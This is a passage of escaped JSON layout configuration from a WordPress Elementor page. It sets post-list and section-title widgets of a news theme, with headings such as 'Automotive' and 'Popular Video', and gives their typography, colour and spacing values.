\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"15\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"o9ytl3o\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Automotive\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#266cc9\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"wfue86x\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"4\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"3gb3qhx\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"1\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"15\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"08b9qjc\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Popular Video\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#a66bbe\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"1t1o7u3\",\"elType\":\"widget